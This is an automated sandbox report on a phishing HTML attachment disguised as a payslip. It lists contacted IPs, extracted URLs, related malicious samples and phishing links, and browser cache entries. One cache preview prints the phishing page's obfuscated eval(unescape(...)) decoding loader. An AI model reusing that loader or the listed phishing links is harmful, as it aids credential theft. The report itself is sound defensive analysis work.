https://bugs.jquery.com/ticket/13378	chromecache_171.2.dr	false		high
https://promisesaplus.com/#point-64	chromecache_171.2.dr	false	URL Reputation: safe	unknown
https://promisesaplus.com/#point-61	chromecache_171.2.dr	false	URL Reputation: safe	unknown
https://drafts.csswg.org/cssom/#resolved-values	chromecache_171.2.dr	false		high
https://bugs.chromium.org/p/chromium/issues/detail?id=589347	chromecache_171.2.dr	false		high
https://html.spec.whatwg.org/multipage/syntax.html#attributes-2	chromecache_171.2.dr	false		high
https://promisesaplus.com/#point-59	chromecache_171.2.dr	false	URL Reputation: safe	unknown
https://jsperf.com/getall-vs-sizzle/2	chromecache_171.2.dr	false		high
https://promisesaplus.com/#point-57	chromecache_171.2.dr	false	URL Reputation: safe	unknown
https://github.com/eslint/eslint/issues/3229	chromecache_171.2.dr	false		high
https://promisesaplus.com/#point-54	chromecache_171.2.dr	false	URL Reputation: safe	unknown
https://html.spec.whatwg.org/multipage/forms.html#category-listed	chromecache_171.2.dr	false		high
https://html.spec.whatwg.org/multipage/scripting.html#selector-disabled	chromecache_171.2.dr	false		high
https://developer.mozilla.org/en-US/docs/CSS/display	chromecache_171.2.dr	false		high
https://jquery.org/license	chromecache_171.2.dr	false		high
https://jquery.com/	chromecache_171.2.dr	false		high
https://getbootstrap.com)	chromecache_173.2.dr	false	Avira URL Cloud: safe	low
https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test	PaySlip_$62,010.50.htm	false		high
https://bugs.webkit.org/show_bug.cgi?id=137337	chromecache_171.2.dr	false		high
https://html.spec.whatwg.org/multipage/scripting.html#selector-enabled	chromecache_171.2.dr	false		high
https://github.com/twbs/bootstrap/blob/master/LICENSE)	chromecache_173.2.dr	false		high
https://promisesaplus.com/#point-48	chromecache_171.2.dr	false	URL Reputation: safe	unknown
https://github.com/jquery/sizzle/pull/225	chromecache_171.2.dr	false		high
https://sizzlejs.com/	chromecache_171.2.dr	false		high
https://bugs.chromium.org/p/chromium/issues/detail?id=449857	chromecache_171.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.68	unknown	United States	15169	GOOGLEUS	false
104.17.24.14	unknown	United States	13335	CLOUDFLARENETUS	false
142.250.184.196	unknown	United States	15169	GOOGLEUS	false
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
34.104.35.123	unknown	United States	15169	GOOGLEUS	false
104.18.10.207	unknown	United States	13335	CLOUDFLARENETUS	false
216.58.212.142	unknown	United States	15169	GOOGLEUS	false
172.64.133.15	unknown	United States	13335	CLOUDFLARENETUS	false
13.107.246.45	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.217.23.106	unknown	United States	15169	GOOGLEUS	false
142.250.185.138	unknown	United States	15169	GOOGLEUS	false
162.62.150.176	unknown	Singapore	132203	TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.217.23.99	unknown	United States	15169	GOOGLEUS	false
69.16.175.10	unknown	United States	20446	HIGHWINDS3US	false
172.217.18.99	unknown	United States	15169	GOOGLEUS	false
216.58.212.141	unknown	United States	15169	GOOGLEUS	false
170.106.97.195	unknown	Singapore	132203	TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN	false
162.241.71.126	unknown	United States	26337	OIS1US	false
152.199.23.37	unknown	United States	15133	EDGECASTUS	false
142.250.186.42	unknown	United States	15169	GOOGLEUS	false
142.250.186.99	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	894908
Start date and time:	2023-06-27 09:25:14 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	PaySlip_$62,010.50.htm
Detection:	MAL
Classification:	mal72.phis.winHTM@28/19@0/23
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .htm

Warnings

Exclude process from analysis (whitelisted): svchost.exe
Not all processes where analyzed, report is missing behavior information
Skipping network analysis since amount of network traffic is too extensive

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.17.24.14	http://vtaurl.com	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/webfonts/fa-brands-400.woff2
104.17.24.14	http://Voyages.CNTraveler.com	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/ScrollMagic/2.0.5/plugins/animation.gsap.js

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://5g7.at/AlBqsYDBJ6UIQQn/d8zikcniSh8U3pi4Y	Get hash	malicious	Unknown	Browse	104.16.125.175
	https://oidsjioiweoriowjdnrwi5.info/	Get hash	malicious	Unknown	Browse	104.21.76.189
	54zEUp34e1.exe	Get hash	malicious	Unknown	Browse	188.114.96.7
	54zEUp34e1.exe	Get hash	malicious	Unknown	Browse	188.114.97.7
	file.exe	Get hash	malicious	CryptOne	Browse	104.21.62.132
	file.exe	Get hash	malicious	CryptOne	Browse	104.21.62.132
	BEFEHL_pdf.exe	Get hash	malicious	DBatLoader, FormBook	Browse	104.21.83.170
	Scan-02.exe	Get hash	malicious	FormBook	Browse	172.67.197.130
	file.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, Vidar	Browse	188.114.96.7
	oE9sBEDk5k.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.18.115.97
	EFTPaymentCopy.htm	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	1687824801-111316-5457-7174-1.eml	Get hash	malicious	Unknown	Browse	104.17.2.184
	http://miami.asa.edu	Get hash	malicious	GRQ Scam	Browse	104.22.19.125
	OriginalMessage.txt.msg	Get hash	malicious	HTMLPhisher	Browse	104.18.26.135
	https://spectrum-asa.com/mit9h	Get hash	malicious	Phisher	Browse	188.114.96.7
	http://eb4.us/0195e07a	Get hash	malicious	Unknown	Browse	104.17.225.78
	http://d1j36b15jieutsflw7ki1l2i.wegostudy.ca/cgi-sys/defaultwebpage.cgi	Get hash	malicious	Unknown	Browse	104.22.1.204
	https://www.bing.com/ck/a?!&&p=638e0f57a212beceJmltdHM9MTY4NzM5MjAwMCZpZ3VpZD0wMGM2MGI0NS1jNTc4LTY5ZTItMzI1ZS0xODZmYzRlZTY4ZGYmaW5zaWQ9NTEyNw&ptn=3&hsh=3&fclid=00c60b45-c578-69e2-325e-186fc4ee68df&u=a1aHR0cDovL3d3dy5kYXl0b25hdG5jLmNvbS9kYXl0b25hdG5jLmh0bQ#amNvb2tAbG9uZG9ucHJvcGVydGllcy5jb20=	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://www.bing.com/ck/a?!&&p=111546c783c61901JmltdHM9MTY4NzMwNTYwMCZpZ3VpZD0wZDk3ZGQxZS1lMDc2LTY5NmQtMDY2MS1jZTNkZTE4NzY4OTgmaW5zaWQ9NTI2MA&ptn=3&hsh=3&fclid=0d97dd1e-e076-696d-0661-ce3de1876898&u=a1aHR0cHM6Ly93d3cuZmFpbHNhbG9uLmNvbS9ob21lL2NoYW55ZWJ1anUvamlqaWFuLw#M=yorktown@raveis.com	Get hash	malicious	HTMLPhisher	Browse	104.21.92.96
	https://indd.adobe.com/view/717e7fb9-fdc2-4fea-a0ed-5d75861f9ca9	Get hash	malicious	Unknown	Browse	104.17.25.14

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\MpSigStub.log

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	17064
Entropy (8bit):	3.5084059438457933
Encrypted:	false
SSDEEP:	192:H88GJBmCrrg8YWgcYXWoZK6ougaBtjMZtjB2Dp1w:H88cACbHaWoZK6omLjMzjB2N1w
MD5:	7D278A66C9A28F6C146F63C34932F9C5
SHA1:	0CAF13F1E0C2E3673ED9F8EB173FBEB78F0CCDCA
SHA-256:	B1ECC16CA309349835A32D558A908F489181D142E16B1827306CECC811033DC5
SHA-512:	42055BBE300F0FCACE906B963ABA5DEF511374CCC193034237F7CEB24FA61BFEE1ECBDEE0C5F0CCA3C638615708A187EA3411ADE164D5633299F607A0A15A8E8
Malicious:	false
Reputation:	low
Preview:	..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....S.t.a.r.t. .t.i.m.e.:. .2.0.2.1.-.0.6.-.0.7. .2.0.:.2.9.:.3.3.Z.....P.r.o.c.e.s.s.:. .2.0.8.4...1.d.7.5.b.d.b.d.3.6.1.e.c.a.b.....C.o.m.m.a.n.d.:. ./.s.t.u.b. .1...1...1.7.8.0.0...4. ./.p.a.y.l.o.a.d. .1...3.4.1...2.3.9...0. ./.p.r.o.g.r.a.m. .C.:.\.W.i.n.d.o.w.s.\.S.E.R.V.I.C.~.1.\.N.E.T.W.O.R.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.p.a.m.-.e.6.3.1.9.c.d.5...e.x.e. ./.q. .W.D.....A.d.m.i.n.i.s.t.r.a.t.o.r.:. .n.o.....V.e.r.s.i.o.n.:. .1...1...1.7.8.0.0...4.........=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=. .P.r.o.d.u.c.t.S.e.a.r.c.h. .=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=......... . . . . . . . . . . . . . . .M.i.c.r.o.s.o.f.t. .W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r. .(.R.S.1.+.).:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . . .S.t.a.t.u.s.:.

Chrome Cache Entry: 164

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (6944), with CRLF line terminators
Category:	downloaded
Size (bytes):	7918
Entropy (8bit):	3.573765531352728
Encrypted:	false
SSDEEP:	192:KFLcCnUb9aMLD8DjB+e5b0rTQLVFuk/ukJTEd7zZH7BR:yzngjLDgjBRRxPuLDfV
MD5:	A2E9544727E242ED94CB733C02520E67
SHA1:	8B0A2047DE9738F80AFFFE9BC7190F227F9F1436
SHA-256:	03FECF33A3D5EE11093F635B617703A0DC77DAE4362795DF6BE4679DB28ADCA0
SHA-512:	982D56C56DC43DC608F681AB5B643ACE00BD9D50C7042EDCBCE47F5A4A30EF91FE98C78C8B119499CB8ABE66C328AFD10418EBEBDD56743277E6DE309CAAE302
Malicious:	false
Reputation:	low
URL:	https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com
Preview:	<html>..<head>..</head>..<body>....<script type="text/javascript">.. ..eval(unescape('%66%75%6e%63%74%69%6f%6e%20%66%38%33%31%32%35%61%35%66%30%35%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%31%30%34%37%37%35%31%30%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%37%31%38%31%31%35%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%33%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));..eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%38%33%31%32%35%61%35%66%30%35%28%27') + '%3e%1d%45%44%

Chrome Cache Entry: 165

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	dropped
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	high, very likely benign file
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 166

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (54926)
Category:	downloaded
Size (bytes):	55111
Entropy (8bit):	4.7118090605418175
Encrypted:	false
SSDEEP:	768:guC31UP18Pq4/vnU63HJXkQCZ/WMQyjJKX719sGsQz5:gu5PWC4/vzH5BCkgc7zsiF
MD5:	E4C542A7F6BF6F74FDD8CDF6E8096396
SHA1:	3A0571A695A35F238026B9398386DC99D9A0C56D
SHA-256:	EEB17A45A48ACA1D7ADBCF04DE155DCD0B47CB36AD036310446BB471FEA9AAA3
SHA-512:	80C8D07836842C9D2BC8223E16D22DBAC53D3240227C265C1AAEFCF45AF3922338F43F256C38686946885F8012535F3BC287CC3658012787246EB5CCF6C13A3E
Malicious:	false
URL:	https://use.fontawesome.com/releases/v5.8.1/css/all.css
Preview:	/!. Font Awesome Free 5.8.1 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa,.fab,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pull-lef

Chrome Cache Entry: 167

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
Category:	downloaded
Size (bytes):	621
Entropy (8bit):	7.673946009263606
Encrypted:	false
SSDEEP:	12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
MD5:	4761405717E938D7E7400BB15715DB1E
SHA1:	76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
SHA-256:	F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
SHA-512:	E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
Malicious:	false
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg
Preview:	..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......\|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E..".......x.@..?u......../....8...

Chrome Cache Entry: 168

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
URL:	https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 169

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32012)
Category:	downloaded
Size (bytes):	69597
Entropy (8bit):	5.369216080582935
Encrypted:	false
SSDEEP:	1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT
MD5:	5F48FC77CAC90C4778FA24EC9C57F37D
SHA1:	9E89D1515BC4C371B86F4CB1002FD8E377C1829F
SHA-256:	9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
SHA-512:	CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
Malicious:	false
URL:	https://code.jquery.com/jquery-3.2.1.slim.min.js
Preview:	/! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector \| (c) JS Foundation and other contributors \| jquery.org/license /.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b\|\|d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e

Chrome Cache Entry: 170

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1864
Entropy (8bit):	5.222032823730197
Encrypted:	false
SSDEEP:	48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
MD5:	BC3D32A696895F78C19DF6C717586A5D
SHA1:	9191CB156A30A3ED79C44C0A16C95159E8FF689D
SHA-256:	0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
SHA-512:	8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r

Chrome Cache Entry: 171

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	271751
Entropy (8bit):	5.0685414131801165
Encrypted:	false
SSDEEP:	6144:+tah6/K+TCtlMhTze/RZcYmDizK8dB7alFys/WL/umH4N0IPfKu5AA11vrIY:9pZcYmDcHwFygmY1PfjAA1Br3
MD5:	6A07DA9FAE934BAF3F749E876BBFDD96
SHA1:	46A436EBA01C79ACDB225757ED80BF54BAD6416B
SHA-256:	D8AA24ECC6CECB1A60515BC093F1C9DA38A0392612D9AB8AE0F7F36E6EEE1FAD
SHA-512:	E525248B09A6FB4022244682892E67BBF64A3E875EB889DB43B0A24AB4A75077B5D5D26943CA382750D4FEBC3883193F3BE581A4660065B6FC7B5EC20C4A044B
Malicious:	false
URL:	https://code.jquery.com/jquery-3.3.1.js
Preview:	/!. jQuery JavaScript Library v3.3.1. * https://jquery.com/. . Includes Sizzle.js. * https://sizzlejs.com/. . Copyright JS Foundation and other contributors. * Released under the MIT license. * https://jquery.org/license. . Date: 2018-01-20T17:24Z. */.( function( global, factory ) {..."use strict";...if ( typeof module === "object" && typeof module.exports === "object" ) {....// For CommonJS and CommonJS-like environments where a proper `window`...// is present, execute the factory and get jQuery....// For environments that do not have a `window` with a `document`...// (such as Node.js), expose a factory as module.exports....// This accentuates the need for the creation of a real `window`....// e.g. var jQuery = require("jquery")(window);...// See ticket #14549 for more info....module.exports = global.document ?....factory( global, true ) :....function( w ) {.....if ( !w.document ) {......throw new Error( "jQuery requires a window with a document" );.....}.....return factor

Chrome Cache Entry: 172

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	1293
Entropy (8bit):	5.454774501621209
Encrypted:	false
SSDEEP:	24:81/nQOY7aMrgwAZzhnQOY7aMrgoRVc+o/rnQOY7aMrgHwy96DGSSf7:coOEaMrgvGOEaMrgoRVc+oUOEaMrgHNn
MD5:	3EB4A99D27BFBFD6512102EDA28F4A28
SHA1:	63B6E98F72E6BFF19A0E08C2EA2F538042CCEA17
SHA-256:	6F9A23F961B3F241843964F9906170E4911D52A8C2C601E0793D5D8BF5A5CF19
SHA-512:	990D18956ACDFF30003D62AA89AA9269297830F2483F462A6DF703BE9EDC14CA7491D5625C223EF953DF6E87C08D1C6DDFB867428A53390076EF50C57E864F69
Malicious:	false
URL:	https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap
Preview:	/* vietnamese /.@font-face {. font-family: 'Archivo Narrow';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/archivonarrow/v29/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6rHmsJCQ.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./ latin-ext /.@font-face {. font-family: 'Archivo Narrow';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/archivonarrow/v29/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6rXmsJCQ.woff2) format('woff2');. unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./ latin */.@font-face {. font-family: 'Archivo Narrow';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com

Chrome Cache Entry: 173

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (48664)
Category:	downloaded
Size (bytes):	48944
Entropy (8bit):	5.272507874206726
Encrypted:	false
SSDEEP:	768:9VG5R15WbHVKZrycEHSYro34CrSLB6WU/6DqBf4l1B:9VIRuo53XiwWTvl1B
MD5:	14D449EB8876FA55E1EF3C2CC52B0C17
SHA1:	A9545831803B1359CFEED47E3B4D6BAE68E40E99
SHA-256:	E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
SHA-512:	00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
Malicious:	false
URL:	https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
